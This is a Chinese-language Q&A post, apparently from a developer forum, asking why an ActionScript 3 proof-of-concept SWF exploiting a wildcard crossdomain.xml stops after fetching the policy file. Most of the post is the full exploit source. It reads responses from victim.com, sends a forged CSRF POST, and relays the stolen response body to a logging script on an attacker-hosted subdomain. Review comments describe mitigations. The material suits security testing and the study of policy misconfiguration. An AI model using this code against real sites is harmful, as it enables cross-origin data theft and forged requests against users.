Actionscript 3 使用actionscript执行跨源请求时不一致
我正在使用由下面的 ActionScript 生成的 SWF,从其托管站点向另一个源发起跨源调用。目标站点上有一个宽松的 crossdomain.xml,如下所示:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!--
  Review note: the wildcard below lets a SWF served from ANY subdomain of
  victim.com read responses from this host, so the policy is only as strong
  as the least-protected subdomain. Prefer listing the exact hosts that need
  access, and leave the "secure" attribute at its default.
-->
<allow-access-from domain="*.victim.com" />
</cross-domain-policy>
我可以看到第一步,即检索 crossdomain.xml 的请求;这段代码已在本地测试过。但是,之后没有任何进一步的请求。
替换为
我找不到这种令人困惑的行为的潜在原因。我是 ActionScript 新手,任何关于为什么会发生这种情况的指点都将不胜感激。只是一个粗略的猜测:还应该有自己的 crossdomain.xml 副本。我认为主域的许可不会自动允许对子域的请求。@organise something.subdomain.victim.com:8000 是漏洞利用代码的宿主,也就是请求的来源。它有自己的跨域策略,但那不应该控制对 victim.com 的请求,对吗?你说 SWF 是在那里托管的,也许是我没说清楚。最后一部分是关于我如何确保它不是代码错误。请阅读问题末尾的第1点到第1点。
// Adaptation of an exploit by John M as defined in
// https://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8
// PHP serverside is replaced with a simpler python cgi. Thanks to trustedsec
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLVariables;
import flash.net.URLLoader;
import flash.net.URLLoaderDataFormat;
/**
 * Proof-of-concept SWF from the question. On construction it issues a GET
 * and a POST to victim.com and forwards the GET response body to a second
 * host.
 *
 * Defender's reading: the cross-origin read can only succeed when the target's
 * crossdomain.xml grants access to the origin serving this SWF. The wildcard
 * policy quoted with the question (domain="*.victim.com") extends that trust
 * to every subdomain, so content hosted on any one of them could read
 * responses from the main site. Mitigation is a narrow policy that names
 * exact hosts, or no policy file at all where Flash clients are not needed.
 */
public class crossDomain extends Sprite {
/**
 * Starts both requests as soon as the SWF is instantiated. The two loads are
 * independent: neither waits for the other to finish.
 */
public function crossDomain() {
// Request 1: GET against the HTTPS origin; the response body is handed to
// completeHandler once the load completes.
var firstrequest:URLRequest = new URLRequest("https://victim.com/a?secret=test");
var firstloader:URLLoader = new URLLoader();
firstloader.addEventListener(Event.COMPLETE, completeHandler);
// The catch only sees errors thrown synchronously by load(). Failures that
// URLLoader reports later as events (IOErrorEvent.IO_ERROR,
// SecurityErrorEvent.SECURITY_ERROR) have no listener registered here, so
// a policy denial or network error produces no trace output from this code.
try {
firstloader.load(firstrequest);
} catch (error: Error) {
trace("Unable to load URL: " + error);
}
// Request 2: state-changing POST (the CSRF half of the demonstration).
// Note the scheme differs from request 1: this one goes to plain HTTP.
var secondvariables:URLVariables = new URLVariables("a=test1&b=test2&c=test3&final=nothing");
var secondrequest:URLRequest = new URLRequest("http://victim.com/someaction.html");
secondrequest.method = URLRequestMethod.POST;
secondrequest.data = secondvariables;
var secondloader:URLLoader = new URLLoader();
// NOTE(review): VARIABLES makes the loader decode the response as
// URL-encoded name/value pairs; an HTML response body would not decode
// cleanly. Confirm this format is intended.
secondloader.dataFormat = URLLoaderDataFormat.VARIABLES;
// No listeners are attached to secondloader, so its response and any
// asynchronous error are discarded.
try {
secondloader.load(secondrequest);
} catch (error: Error) {
trace("Unable to load URL");
}
}
/**
 * Event.COMPLETE handler for the first loader. Takes the loaded response body
 * from event.target.data and POSTs it, as the form field "data", to the
 * logging endpoint on something.subdomain.victim.com:8000.
 *
 * @param event Completion event whose target is the loader that finished.
 */
private function completeHandler(event: Event): void {
// Relaying the HTTP response to the collecting server.
var request:URLRequest = new URLRequest("http://something.subdomain.victim.com:8000/cgi-bin/postlogger.py");
var variables:URLVariables = new URLVariables();
variables.data = event.target.data;
request.method = URLRequestMethod.POST;
request.data = variables;
var loader:URLLoader = new URLLoader();
// As in the constructor, only synchronous exceptions are caught; the
// outcome of this upload is never observed.
try {
loader.load(request);
} catch (error: Error) {
trace("Unable to load URL");
}
}
}
}